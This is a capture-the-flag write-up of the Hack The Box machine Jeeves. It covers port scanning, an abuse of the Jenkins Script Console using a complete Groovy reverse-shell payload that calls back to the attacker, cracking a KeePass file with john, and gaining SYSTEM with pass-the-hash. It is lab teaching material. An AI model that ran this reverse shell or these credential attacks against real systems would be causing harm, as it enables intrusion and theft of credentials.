As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Sat Nov 5 12:46:41 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.051s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2
# Nmap done at Sat Nov 5 12:47:21 2022 -- 1 IP address (1 host up) scanned in 39.67 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Sat Nov 5 12:49:06 2022 as: nmap -sCV -p80,135,445,50000 -oN targeted 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-05T16:49:23
|_ start_date: 2022-11-05T16:45:35
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h00m03s, deviation: 0s, median: 5h00m02s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 5 12:49:56 2022 -- 1 IP address (1 host up) scanned in 50.03 seconds
The website on port 80 just shows a website which doesn't have much utility.
And the website on port 50000 shows a Jetty 9.4.z site.
If we enumerate subdirectories with gobuster on this last website, we'll find the /askjeeves directory.
gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.63:50000/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/06 22:03:07 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]
===============================================================
2022/11/06 22:03:48 Finished
===============================================================
Exploitation
In the /askjeeves directory, we'll find a Jenkins server.
In a Jenkins server, when we are able to see the Manage Jenkins section, we can run commands on the system via the Script Console section.
All we have to do is set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
And run the following command, which will send a reverse shell to our netcat listener.
String host="10.10.14.6";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Once we get the shell, we could be able to grab the user flag.
Listening on 0.0.0.0 4444
Connection received on 10.10.10.63 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>whoami
jeeves\kohsuke
C:\Users\Administrator\.jenkins>type \users\kohsuke\desktop\user.txt
e3232272596fb47950d59c4cf1e7066a
Privilege Escalation
Inside the kohsuke documents directory we'll see a CEH.kdbx file.
dir \users\kohsuke\documents
dir \users\kohsuke\documents
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\users\kohsuke\documents
11/03/2017 10:18 PM <DIR> .
11/03/2017 10:18 PM <DIR> ..
09/18/2017 12:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 2,664,460,288 bytes free
The .cdbx files are used by KeePass, and usually contains usernames and passwords.
KeePass is a password manager that allows you to securely protect different passwords, officially supports MacOS and Linux operating systems through the use of Mono.
Let's transfer that file to our machine. First create a SMB share in the current directory.
As these type of files are encrypted with a password, we'll have to break it. First, get the hash of the file with keepass2john and put it in the hash file.
keepass2john CEH.kdbx > hash
Now, break the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:03:21 DONE (2022-11-06 22:34) 0.004956g/s 272.5p/s 272.5c/s 272.5C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we know the password, we can open the CEH.kdbx file.
keepassxc CEH.kdbx
Inside the Backup stuff entry, we'll see that the password is an NTLM hash.
Which seems to be the NTLM hash of the administrator user.
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file glmGVnZp.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service dMpa on 10.10.10.63.....
[*] Starting service dMpa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
At this point, we could get the root flag, but there is another file called hm.txt file instead of the root flag in the administrator's desktop.
dir \users\administrator\desktop
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\users\administrator\desktop
11/08/2017 09:05 AM <DIR> .
11/08/2017 09:05 AM <DIR> ..
12/24/2017 02:51 AM 36 hm.txt
11/08/2017 09:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,663,813,120 bytes free
The file says to look deeper.
type \users\administrator\desktop\hm.txt
The flag is elsewhere. Look deeper.
If we go to the desktop and try to list the alternative data streams, we'll see one called hm.txt:root.txt.
Alternate Data Streams have the ability of forking data into an existing file without changing its file size or functionality.
Finally, all we have to do is get the content of the alternative data stream, and reap the harvest and take the root flag.
